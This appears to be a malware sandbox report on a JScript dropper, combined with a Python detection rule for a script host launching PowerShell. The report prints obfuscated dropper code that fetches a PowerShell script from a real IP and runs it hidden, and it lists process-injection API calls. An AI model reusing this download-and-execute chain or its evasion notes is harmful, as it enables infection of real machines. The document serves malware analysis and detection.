iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • Show all Function Runs
                                                                                                                                                                                                                                                      116
                                                                                                                                                                                                                                                      return q;
                                                                                                                                                                                                                                                        117
                                                                                                                                                                                                                                                        };
                                                                                                                                                                                                                                                          118
                                                                                                                                                                                                                                                          return a ( );
                                                                                                                                                                                                                                                          • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                          • Show all Function Runs
                                                                                                                                                                                                                                                          119
                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                            120
                                                                                                                                                                                                                                                            function LogError(d) {
                                                                                                                                                                                                                                                              121
                                                                                                                                                                                                                                                              var o = l;
                                                                                                                                                                                                                                                                122
                                                                                                                                                                                                                                                                WScript[o ( 0x1f5, '6hid' ) ] ( d );
                                                                                                                                                                                                                                                                  123
                                                                                                                                                                                                                                                                  }
                                                                                                                                                                                                                                                                    124
                                                                                                                                                                                                                                                                    function RunPowerShellScript(d) {
                                                                                                                                                                                                                                                                    • RunPowerShellScript("C:\Temp\WTRTRWFSHS.ps1") ➔ undefined
                                                                                                                                                                                                                                                                    125
                                                                                                                                                                                                                                                                    var p = k;
                                                                                                                                                                                                                                                                      126
                                                                                                                                                                                                                                                                      try
                                                                                                                                                                                                                                                                        127
                                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                                          128
                                                                                                                                                                                                                                                                          var f = POWERSHELL_CMD + '\x22' + d + '\x22';
                                                                                                                                                                                                                                                                            129
                                                                                                                                                                                                                                                                            shell[p ( 0x1f6 ) ] ( f, 0x0, ! ! [] );
                                                                                                                                                                                                                                                                            • p(502) ➔ "Run"
                                                                                                                                                                                                                                                                            • Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"",0,true) ➔ 0
                                                                                                                                                                                                                                                                            • Show all Function Runs
                                                                                                                                                                                                                                                                            130
                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                              131
                                                                                                                                                                                                                                                                              catch ( g )
                                                                                                                                                                                                                                                                                132
                                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                                  133
                                                                                                                                                                                                                                                                                  LogError ( p ( 0x209 ) + g['message'] );
                                                                                                                                                                                                                                                                                    134
                                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                                      135
                                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                                        136
                                                                                                                                                                                                                                                                                        DownloadScript ( URL, DownloadPath ) ? RunPowerShellScript ( DownloadPath ) : ( LogError ( 'Exiting\x20script\x20due\x20to\x20download\x20failure.' ), WScript[l ( 0x207, 'uWy)' ) ] ( ) );
                                                                                                                                                                                                                                                                                        • DownloadScript("http://176.65.144.3/dev/devil.ps1","C:\Temp\WTRTRWFSHS.ps1") ➔ true
                                                                                                                                                                                                                                                                                        • RunPowerShellScript("C:\Temp\WTRTRWFSHS.ps1") ➔ undefined
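Read together with the function-run annotations, this excerpt is the whole dropper chain: a() returns the obfuscated string table that the m/k/l accessors decode on demand, DownloadScript fetches http://176.65.144.3/dev/devil.ps1 to C:\Temp\WTRTRWFSHS.ps1, and RunPowerShellScript hands that path to WScript.Shell.Run with window style 0 (hidden) and bWaitOnReturn true, producing the command line PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1". RemoteSigned is no obstacle here: it only demands a signature on files that carry an Internet Zone.Identifier mark, and a file written by a script rather than saved by a browser carries none. The detection below is an added example, not code from the Joe Sandbox report or from the sample. It runs over constructed Sysmon-style process-creation events (ParentImage, Image, CommandLine) and flags a script host spawning PowerShell, extracting the -File target and the execution policy; the switch abbreviation table, the user-writable path pattern and the benign sample events are assumptions for illustration, and only the first event's command line and script path come from the report.

```python
"""Detect the Windows Script Host -> powershell.exe -File launch chain.

Added example, not from the Joe Sandbox report or the sample. SAMPLE_EVENTS
are constructed; only the first command line and script path are the report's.
"""
from __future__ import annotations

import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Drop locations a downloader typically writes to (assumption; tune per estate).
USER_WRITABLE = re.compile(
    r"(?i)\\(temp|tmp|programdata|users\\[^\\]+\\(appdata|downloads|public))\\"
)
# Policies under which an unsigned .ps1 with no Mark-of-the-Web runs unchallenged.
WEAK_POLICIES = {"bypass", "unrestricted", "remotesigned"}

# powershell.exe accepts unambiguous prefixes of its switch names plus a few
# fixed short forms; only the switches relevant here are modelled (assumption).
SWITCHES = ("executionpolicy", "noprofile", "file", "command",
            "encodedcommand", "windowstyle")
ALIASES = {"ep": "executionpolicy", "nop": "noprofile", "f": "file",
           "c": "command", "e": "encodedcommand", "ec": "encodedcommand",
           "enc": "encodedcommand", "w": "windowstyle"}
TAKES_VALUE = {"executionpolicy", "file", "command", "encodedcommand", "windowstyle"}


def tokenize_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes."""
    tokens, current, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if current:
                tokens.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append("".join(current))
    return tokens


def canonical_switch(token: str) -> str | None:
    """Expand '-ep', '-exec', '/File' and similar to one canonical switch name."""
    if not token.startswith(("-", "/")):
        return None
    name = token[1:].lower()
    if name in ALIASES:
        return ALIASES[name]
    matches = [s for s in SWITCHES if s.startswith(name)]
    return matches[0] if len(matches) == 1 else name


def parse_powershell_switches(tokens: list[str]) -> dict[str, str | None]:
    """Map each switch to its value (None for bare flags); tokens[0] is the image."""
    parsed: dict[str, str | None] = {}
    i = 1
    while i < len(tokens):
        switch = canonical_switch(tokens[i])
        if switch is None:
            i += 1
            continue
        if switch in TAKES_VALUE and i + 1 < len(tokens):
            parsed[switch] = tokens[i + 1]
            i += 2
        else:
            parsed[switch] = None
            i += 1
    return parsed


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_script_host_powershell(event: dict) -> dict | None:
    """Return findings for a script host spawning PowerShell, else None."""
    if image_name(event["ParentImage"]) not in SCRIPT_HOSTS:
        return None
    if image_name(event["Image"]) not in POWERSHELL_IMAGES:
        return None
    switches = parse_powershell_switches(tokenize_cmdline(event["CommandLine"]))
    script = switches.get("file")
    policy = (switches.get("executionpolicy") or "").lower()
    reasons = ["powershell.exe spawned by a Windows Script Host process"]
    if script and USER_WRITABLE.search(script):
        reasons.append(f"-File targets a user-writable location: {script}")
    if policy in WEAK_POLICIES:
        reasons.append(f"-ExecutionPolicy {policy} does not stop an unmarked dropped .ps1")
    if "noprofile" in switches:
        reasons.append("-NoProfile skips profile scripts, a common dropper trait")
    return {"script_path": script, "execution_policy": policy or None, "reasons": reasons}


SAMPLE_EVENTS = [
    {   # the chain from the report's Run() annotation, as a Sysmon-style event
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"',
    },
    {   # constructed benign case: an operator runs a script from a console
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -File "C:\Program Files\Ops\rotate-logs.ps1"',
    },
    {   # constructed: script host spawning cmd.exe, outside this rule's scope
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c echo hi",
    },
]


def run_detection(events: list[dict] = SAMPLE_EVENTS) -> list[dict]:
    """Apply the rule to every event and return only the hits."""
    return [hit for hit in map(detect_script_host_powershell, events) if hit]
```

Calling run_detection() on the embedded events yields one hit, for the wscript.exe-to-powershell.exe event, with script_path C:\Temp\WTRTRWFSHS.ps1 and execution_policy remotesigned. The switch parser matters more than it looks: the same dropper rewritten with -ep, -nop and -f would evade a rule that matches the spelled-out switch names, and abbreviated forms are exactly what real droppers use.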

Executed Functions

Memory Dump Source
• Source File: 00000009.00000002.1370792489.00007FFC3C3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C3D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffc3c3d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 30f0f16a8a4a2fc5569d4b2a39dbd997b293c7f3dc7e521ee7f59c3b23a3c5ae
• Instruction ID: 6437e8bbeade10966a7310e55d46e01c841f0aab817115dd19fb67e48ca6f5de
• Opcode Fuzzy Hash: 30f0f16a8a4a2fc5569d4b2a39dbd997b293c7f3dc7e521ee7f59c3b23a3c5ae
• Instruction Fuzzy Hash: 5DE16731A0DB9D4FE799D7285819AF87BE1EF86310B0901FBD049C71A3ED299C45C7A1
Memory Dump Source
• Source File: 00000009.00000002.1370792489.00007FFC3C3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C3D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffc3c3d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f7383f14f3e087985c71b9ad6dd7385fb1830c4545c96b0cd684efb0fbf2f5ee
• Instruction ID: 8fef3b4b8f2f8ee63761709fca65140846e6d4c92c0ba716eb15b5c0eb8981d4
• Opcode Fuzzy Hash: f7383f14f3e087985c71b9ad6dd7385fb1830c4545c96b0cd684efb0fbf2f5ee
• Instruction Fuzzy Hash: 93112B26E0CA3E4BE6ECD218605A9FC22C1EFD4790B450179D50DC3192EE2D6C81E2E1
Memory Dump Source
• Source File: 00000009.00000002.1370055801.00007FFC3C300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffc3c300000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
• Instruction ID: adb4e0c4f36993e609ea8e39238dcb8302d1348298458dea11f8070c78382f5c
• Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
• Instruction Fuzzy Hash: 3601677111CB0D4FD784EF0CE451AA6B7E0FB95364F10056DE58AC3661D636E882CB46

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage: 19.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 10.9%
Total number of Nodes: 64
Total number of Limit Nodes: 3
execution_graph (rendered graph; the raw node/edge list is omitted). API calls labelled on the graph nodes: ReadProcessMemory (cf7b54), WriteProcessMemory (cf79b1, cf79fc), ResumeThread (cf76bc), VirtualProtect (cf1c25), VirtualAllocEx (cf78d4), Wow64SetThreadContext (cf77b1), CreateProcessA (cf7dbf).

Executed Functions

Strings
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID: 0.V$<$@
• API String ID: 0-3650422160
• Opcode ID: 1eae45f22cdd084297ba47ae0ca3a89847bdca951641dd5d7c36c91dd187a239
• Instruction ID: 6207df5b3e2e1b91fd6ecaa905ed23b04929a3a8a9c89fce52a5cffc419952da
• Opcode Fuzzy Hash: 1eae45f22cdd084297ba47ae0ca3a89847bdca951641dd5d7c36c91dd187a239
• Instruction Fuzzy Hash: 3562AF74D0021ACFDB64DFA9CA84B9DFBF2BF88301F1981A9D518AB211D7709A81DF51
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID: P$$q$kH
• API String ID: 0-905882517
• Opcode ID: 6d81c884e81f9a508dc7b13cf856ee4c0961f72ab0e7e9e4713702f4bb7e3e7d
• Instruction ID: 5ed4481e1529a38cbfc8708954a44507e7faa6b73e08f3ab7de3ed11a763d486
• Opcode Fuzzy Hash: 6d81c884e81f9a508dc7b13cf856ee4c0961f72ab0e7e9e4713702f4bb7e3e7d
• Instruction Fuzzy Hash: AB52F774A01259CFDB64DFA9C984B9EFBB2BF89301F15C195D548AB212C7309E81CF52
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID: P$$q$kH
• API String ID: 0-905882517
• Opcode ID: ee0ec0a853d921ac251f7fbf517fcd479281c0896e33b7b71d338b626e18220c
• Instruction ID: 746c20e5ba528bc23cd901452555b42d6b2bef26653d1406f5e0f8a616ad7dda
• Opcode Fuzzy Hash: ee0ec0a853d921ac251f7fbf517fcd479281c0896e33b7b71d338b626e18220c
• Instruction Fuzzy Hash: A9B1B574E00219CFEB68CF66C840BAEBBB2BB89300F14C5EA950DA7255DB705E81DF51

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (rendered graph; the raw basic-block edge list is omitted). Basic blocks cf823f through cf946e; block cf838b calls cf7d38 / cf7d37.
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID: zsU$zsU
• API String ID: 0-2047252256
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID: $q
• API String ID: 0-1301096350
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID: $q
• API String ID: 0-1301096350
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 53c4d5aa8eec3d718c9884ed56b83fcb36fc590ecfb3ed2b90052e5df2eda6ed
• Instruction ID: efd14d64481c4582a930e965b41f047341df9e55140d65f01246495b32af87a1
• Opcode Fuzzy Hash: 53c4d5aa8eec3d718c9884ed56b83fcb36fc590ecfb3ed2b90052e5df2eda6ed
• Instruction Fuzzy Hash: 65514970D0920DDFDB45DFA6C5446EEBBB2BF89300F20956AC512BB250CB399A02CF56
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 69a528543d22483f8868b67e8078e7bd7a5b5a95908e0e1104ba3dea07670a45
• Instruction ID: 2422c199d6c7c3c2111bd1292cc13ff0c218beb248ebf941f217b8d2c677dc42
• Opcode Fuzzy Hash: 69a528543d22483f8868b67e8078e7bd7a5b5a95908e0e1104ba3dea07670a45
• Instruction Fuzzy Hash: 0751E274D06618CFDB58CFEAD8486EDFBB2BB8A305F20902AD41AB7254DB348945CF05
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 414c0ad2ffbbab74c29096e3ee7cbfb3add0746617f69db9723f7d2b8f5c35c1
• Instruction ID: 97794f77121a53fa3d63283c4a7f00bdbc2c5ffa964699f553c718076bbe0182
• Opcode Fuzzy Hash: 414c0ad2ffbbab74c29096e3ee7cbfb3add0746617f69db9723f7d2b8f5c35c1
• Instruction Fuzzy Hash: 0C511971D40269DBDB64CF55D8407EDB7B2EB89310F10C5EAD10AB7250EB309A858F55

Control-flow Graph

[Graph image not reproduced. Legend: Executed / Not Executed. Function blocks cf7d38-cf817e; CreateProcessA is called from block cf7f24-cf8012.]
APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CF7FFF
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 41a0d9d1644baa146b47d5dbd7218d0c4b0217d92ec1de149bc2bd039f51dcd5
• Instruction ID: 5b2ac8b8e0a0adf50a5c39e56c76fd4f407eae87be633acf560a271e664a67b0
• Opcode Fuzzy Hash: 41a0d9d1644baa146b47d5dbd7218d0c4b0217d92ec1de149bc2bd039f51dcd5
• Instruction Fuzzy Hash: A6C11370D0021D8FDB64CFA8C841BEDBBB1BB49304F1096AAE959B7240DB749E85CF95

Control-flow Graph

[Graph image not reproduced. Legend: Executed / Not Executed. Function blocks cf7d37-cf817e; CreateProcessA is called from block cf7f24-cf8012.]
APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CF7FFF
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: f38c74b45e25a9c8747f1f45eee45211f3a214de7c50797f30d4ad67a77defae
• Instruction ID: 361b1f080177e485a20e193d362995246823eb470b0ded57e69ddd070abc680f
• Opcode Fuzzy Hash: f38c74b45e25a9c8747f1f45eee45211f3a214de7c50797f30d4ad67a77defae
• Instruction Fuzzy Hash: 4CC10370D0021D8FDB64CFA8C841BEDBBB1BB49304F1096AAE959B7240DB749E85CF95

Control-flow Graph

[Graph image not reproduced. Legend: Executed / Not Executed. Function blocks cf79a8-cf7aee; WriteProcessMemory is called from block cf7a32-cf7a93.]
APIs
• WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00CF7A83
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 5f6717789c0737f65e06d5ec2dc973ffc8526c39271776562b6107b18e7f26fe
• Instruction ID: 76663d7b93369d044af0e8250d1e5d2d9c940f85da056fa0e0cef9bdaf7a741a
• Opcode Fuzzy Hash: 5f6717789c0737f65e06d5ec2dc973ffc8526c39271776562b6107b18e7f26fe
• Instruction Fuzzy Hash: B141ABB5D052589FCF04CFA9D984AEEBBF1FB49310F24902AE818B7210D779AA45CF54

Control-flow Graph
• Blocks and edges: 700 cf79b0-cf7a1b 702 cf7a1d-cf7a2f 700->702 703 cf7a32-cf7a93 WriteProcessMemory 700->703 702->703 705 cf7a9c-cf7aee 703->705 706 cf7a95-cf7a9b 703->706 706->705
APIs
• WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00CF7A83
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: af2ef0eeb5550599032864f9bab20130d4a49bf579dbee830b493b859a321a5a
• Instruction ID: bd890993c76b8de8f3b084540987a6196b397b727d74e0e678a44f2b34d79ef2
• Opcode Fuzzy Hash: af2ef0eeb5550599032864f9bab20130d4a49bf579dbee830b493b859a321a5a
• Instruction Fuzzy Hash: 0F41A9B5D012589FCF00CFA9D980AEEBBF1BB09310F24902AE818B7200D739AA45CB54

Control-flow Graph
• Blocks and edges: 720 cf7b08-cf7bca ReadProcessMemory 723 cf7bcc-cf7bd2 720->723 724 cf7bd3-cf7c25 720->724 723->724
APIs
